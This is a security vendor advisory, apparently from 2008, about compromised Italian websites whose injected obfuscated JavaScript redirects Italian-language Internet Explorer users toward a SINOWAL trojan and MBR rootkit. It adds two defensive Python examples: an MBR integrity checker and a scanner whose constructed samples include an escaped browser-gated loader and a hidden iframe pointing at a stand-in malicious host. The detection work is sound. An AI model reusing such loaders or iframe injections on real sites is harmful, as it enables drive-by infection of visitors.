    In what may turn out to be an early one-year “toast” to the June 2007 mass infection that came to be known as the Italian Job, TrendLabs discovered 90 compromised Italian Web sites (all verified active as of this writing) at around 12:30 AM GMT. The compromised sites are varied; the only thematic link among them is the Italian language.

    According to Trend Micro analysts, the attack unfolds as follows:

    1. The compromised Web sites contain obfuscated JavaScript code (detected as JS_AFIR.A) that redirects the browser to the malicious URL http://{BLOCKED}r.com/cgi-bin/index.cgi?grb&js=1.

    Before redirecting, the script checks the Internet Explorer version and the browser language setting, so it executes only in Internet Explorer configured for Italian.

    2. That URL redirects to a second URL, http://{BLOCKED}f.com/cgi-bin/index.cgi?grobin (blocked by Web Reputation Services since April 27).

    Both malicious sites are hosted on a single IP address, traced back to San Diego, California.

    3. The second site serves TROJ_SINOWAL.CB (detected since April 26 GMT) from the same domain. TROJ_SINOWAL.CB then drops BKDR_SINOWAL.CF (detected since April 30 GMT), which in turn installs a rootkit component on the affected PC.

    This rootkit component overwrites certain sectors of the infected hard disk, including the MBR. It also hooks Driver.sys so that read and write requests for those sectors coming from AV/security software are intercepted, hiding the modifications from the running system.

    See infection diagram below.
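    Because the rootkit in step 3 hides its sector changes from software running on the infected system, the check a responder wants is an offline one. The following is an added example, not Trend Micro's RootkitBuster or any code from this post: it parses a 512-byte MBR, hashes the 446-byte bootstrap code, compares it against a baseline recorded while the machine was clean, and sanity-checks the partition table. The sample MBRs and the baseline hash are constructed here; the rootkit's actual on-disk layout is not reproduced.

```python
"""Offline MBR integrity check (added example, not TrendLabs tooling).

A read taken from inside the infected OS cannot be trusted, because the
rootkit hooks the disk driver and intercepts reads of the sectors it changed.
Read sector 0 from outside the suspect OS (boot from clean media, or attach the
disk to a known-clean machine) and compare the bootstrap code against a
baseline taken when the machine was clean. Both MBRs below are constructed.
"""
import hashlib
import struct

SECTOR_SIZE = 512
BOOT_CODE_LEN = 446           # bootstrap code occupies bytes 0..445
PART_TABLE_OFF = 446          # four 16-byte partition entries follow
BOOT_SIGNATURE = b"\x55\xaa"  # bytes 510..511


def read_first_sector(device_path):
    """Raw read of sector 0. Linux: "/dev/sda"; Windows: r"\\.\PhysicalDrive0"
    (needs administrator rights). Only meaningful when run outside the suspect OS."""
    with open(device_path, "rb") as f:
        return f.read(SECTOR_SIZE)


def parse_mbr(sector):
    """Split a 512-byte MBR into a bootstrap-code hash and the partition entries."""
    if len(sector) != SECTOR_SIZE:
        raise ValueError("expected %d bytes, got %d" % (SECTOR_SIZE, len(sector)))
    if sector[510:512] != BOOT_SIGNATURE:
        raise ValueError("missing 0x55AA boot signature")
    partitions = []
    for i in range(4):
        # status, CHS start (skipped), type, CHS end (skipped), LBA start, sector count
        status, ptype, lba_start, num_sectors = struct.unpack_from(
            "<B3xB3xII", sector, PART_TABLE_OFF + 16 * i)
        if ptype == 0:
            continue  # empty slot
        partitions.append({"index": i, "bootable": status == 0x80, "type": ptype,
                           "lba_start": lba_start, "sectors": num_sectors})
    return {"boot_code_sha256": hashlib.sha256(sector[:BOOT_CODE_LEN]).hexdigest(),
            "partitions": partitions}


def check_mbr(sector, baseline_sha256):
    """Return (parsed_mbr, findings); an empty findings list means the bootstrap
    code matches the baseline and the partition table is sane."""
    info = parse_mbr(sector)
    findings = []
    if info["boot_code_sha256"] != baseline_sha256:
        findings.append("bootstrap code differs from baseline")
    if not any(p["bootable"] for p in info["partitions"]):
        findings.append("no active partition")
    spans = sorted((p["lba_start"], p["lba_start"] + p["sectors"]) for p in info["partitions"])
    for (_, end1), (start2, _) in zip(spans, spans[1:]):
        if start2 < end1:
            findings.append("overlapping partition entries")
            break
    return info, findings


# --- constructed samples (not real boot loaders, not the rootkit's layout) ---
def _build_mbr(boot_code, entries):
    table = b"".join(struct.pack("<B3xB3xII", *e) for e in entries)
    table += b"\x00" * (64 - len(table))
    return boot_code.ljust(BOOT_CODE_LEN, b"\x00") + table + BOOT_SIGNATURE


# Clean bootstrap code: a short prologue followed by NOP filler (constructed).
CLEAN_BOOT_CODE = b"\x33\xc0\x8e\xd0\xbc\x00\x7c" + b"\x90" * (BOOT_CODE_LEN - 7)
PARTITIONS = [(0x80, 0x07, 2048, 1000000)]  # one active NTFS partition at LBA 2048
CLEAN_MBR = _build_mbr(CLEAN_BOOT_CODE, PARTITIONS)
CLEAN_BASELINE = hashlib.sha256(CLEAN_BOOT_CODE).hexdigest()  # record this while clean

# Tampered: the first instruction is replaced by a short jump; the partition
# table is left intact so the system still boots normally (constructed).
TAMPERED_MBR = _build_mbr(b"\xeb\x20" + CLEAN_BOOT_CODE[2:], PARTITIONS)

if __name__ == "__main__":
    for name, mbr in (("clean", CLEAN_MBR), ("tampered", TAMPERED_MBR)):
        info, findings = check_mbr(mbr, CLEAN_BASELINE)
        print(name, info["boot_code_sha256"][:16], findings or "OK")
```

    Record CLEAN_BASELINE from a known-good image (or from the disk immediately after a clean install) and keep it off the machine; a matching hash on a sector read through the infected OS proves nothing, since that is exactly the read the driver hook is there to sanitize.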

    SINOWAL variants are known droppers of information-stealing malware.

    As of this writing, TrendLabs has seen two forms of this compromise: one injects only the obfuscated script that redirects to the malicious URL; the other injects a plaintext (unobfuscated) iframe together with the same obfuscated script.
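    The two injection forms just described, as an added example that is not code from this post or from Trend Micro: a small Python scanner that pulls inline scripts and iframes out of a page, peels %XX and \xXX escape layers to expose the redirect target, and flags an escape-encoded payload handed to unescape/eval/document.write, a hidden iframe, or any reference to the /cgi-bin/index.cgi?gr... path the post gives. The sample pages and payload are constructed for illustration, the host blocked-r.invalid stands in for the redacted {BLOCKED}r.com, and the decoded payload's IE/Italian gate is a reconstruction of the check the post describes, not the real JS_AFIR.A code.

```python
"""Scanner for injected obfuscated scripts and iframes (added example).

Not the TrendLabs signature. Only the redirect path /cgi-bin/index.cgi?grb&js=1
comes from the post; the host blocked-r.invalid, the sample pages and the
escaped payload are constructed here.
"""
import re
from html.parser import HTMLParser
from urllib.parse import unquote

# Indicator from the post: the redirect target's path (host redacted there).
IOC_PATH_RE = re.compile(r"/cgi-bin/index\.cgi\?gr", re.IGNORECASE)
# Heuristic for escape-encoded payloads: a run of 16+ %XX, \xXX or \uXXXX escapes.
ESCAPE_RUN_RE = re.compile(r"(?:%[0-9a-fA-F]{2}|\\x[0-9a-fA-F]{2}|\\u[0-9a-fA-F]{4}){16,}")
DECODER_CALL_RE = re.compile(r"\b(?:unescape|eval|document\.write)\s*\(")
URL_RE = re.compile(r"https?://[^\s'\"<>]+", re.IGNORECASE)


class _Collector(HTMLParser):
    """Gather inline <script> bodies and <iframe> attributes from a page."""

    def __init__(self):
        super().__init__()
        self.scripts, self.iframes = [], []
        self._in_script, self._buf = False, []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self._in_script, self._buf = True, []
        elif tag == "iframe":
            self.iframes.append({k: (v or "") for k, v in attrs})

    def handle_endtag(self, tag):
        if tag == "script" and self._in_script:
            self.scripts.append("".join(self._buf))
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)


def deobfuscate(src, rounds=3):
    """Peel common escape layers (URL %XX, JS \\xXX and \\uXXXX) until stable."""
    out = src
    for _ in range(rounds):
        prev = out
        out = unquote(out)
        out = re.sub(r"\\x([0-9a-fA-F]{2})", lambda m: chr(int(m.group(1), 16)), out)
        out = re.sub(r"\\u([0-9a-fA-F]{4})", lambda m: chr(int(m.group(1), 16)), out)
        if out == prev:
            break
    return out


def _is_hidden(attrs):
    style = attrs.get("style", "").replace(" ", "").lower()
    zero = [attrs.get(k, "").strip().rstrip("px") == "0" for k in ("width", "height")]
    return any(zero) or "display:none" in style or "visibility:hidden" in style


def scan_html(html):
    """Return a list of findings; an empty list means nothing suspicious was seen."""
    page = _Collector()
    page.feed(html)
    findings = []
    for i, script in enumerate(page.scripts):
        reasons = []
        if DECODER_CALL_RE.search(script) and ESCAPE_RUN_RE.search(script):
            reasons.append("escape-encoded payload fed to unescape/eval/document.write")
        urls = URL_RE.findall(deobfuscate(script))
        ioc = [u for u in urls if IOC_PATH_RE.search(u)]
        if ioc:
            reasons.append("decoded script references the known redirect URL")
        if reasons:
            findings.append({"kind": "script", "index": i, "urls": urls, "ioc": ioc, "reasons": reasons})
    for i, attrs in enumerate(page.iframes):
        src, reasons = attrs.get("src", ""), []
        if IOC_PATH_RE.search(src):
            reasons.append("iframe src is the known redirect URL")
        if _is_hidden(attrs):
            reasons.append("iframe is hidden (zero size or display:none)")
        if reasons:
            findings.append({"kind": "iframe", "index": i, "urls": [src],
                             "ioc": [src] if IOC_PATH_RE.search(src) else [], "reasons": reasons})
    return findings


# --- constructed samples (not captured from the compromised sites) ---
_MALICIOUS_URL = "http://blocked-r.invalid/cgi-bin/index.cgi?grb&js=1"
# Decoded payload: gate on Internet Explorer with an Italian language setting
# (reconstruction of the check the post describes), then load the remote script.
_PAYLOAD = ('if(/MSIE/.test(navigator.userAgent)&&/^it/i.test(navigator.userLanguage||navigator.language))'
            '{document.write(\'<script src="' + _MALICIOUS_URL + '"><\\/script>\')}')
_ESCAPED = "".join("%%%02X" % b for b in _PAYLOAD.encode())
_OBF_SCRIPT = '<script type="text/javascript">document.write(unescape("' + _ESCAPED + '"));</script>'

SAMPLE_SCRIPT_ONLY = "<html><body><h1>Benvenuti</h1>" + _OBF_SCRIPT + "</body></html>"
SAMPLE_IFRAME_AND_SCRIPT = ('<html><body><iframe src="' + _MALICIOUS_URL
                            + '" width="0" height="0" style="display:none"></iframe>'
                            + _OBF_SCRIPT + "<p>Notizie</p></body></html>")
SAMPLE_CLEAN = ('<html><body><script>document.write(new Date().getFullYear());</script>'
                '<iframe src="http://video.example/embed/42" width="480" height="270"></iframe></body></html>')

if __name__ == "__main__":
    for name, page in (("script only", SAMPLE_SCRIPT_ONLY),
                       ("iframe + script", SAMPLE_IFRAME_AND_SCRIPT), ("clean", SAMPLE_CLEAN)):
        print(name, scan_html(page) or "no findings")
```

    Run it over a crawl of the site's own HTML (or a proxy-log replay) rather than by visiting pages in a browser: the gate on Internet Explorer and the Italian language setting means a fetch from any other client shows nothing, and decoding the page content exposes the redirect target regardless of client.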

    It appears that this attack affects sites hosted in Italy by a single hosting provider, the same one that hosted the thousands of sites (mostly travel and leisure) compromised in last year’s large-scale infection. This time, the compromised sites include the following:

    • The official site of Monica Bellucci (famous Italian model-actress)
    • The Mercedes-Benz club of Italy
    • The official Web page of Sabrina Salerno (Italian singer)
    • A Johnny Depp fan site
    • A fan site of Pearl Jam

    [Screenshots of the first three sites listed above (Monica Bellucci, Mercedes-Benz club of Italy, Sabrina Salerno) are not reproduced here.]

    Trend Micro customers are already protected from this threat. Web Threat Protection has blocked access to the malicious pages since 27 April 2008. The URLs have been added to our emergency database and are blocked by WCS (Web Classify Server), making them inaccessible to customers. The RootkitBuster tool can also scan for and detect the MBR-rootkit component used in this attack.

    Last updated at 5:27 PM GMT, 3 May 2008

    © Copyright 2013 Trend Micro Inc. All rights reserved. Legal Notice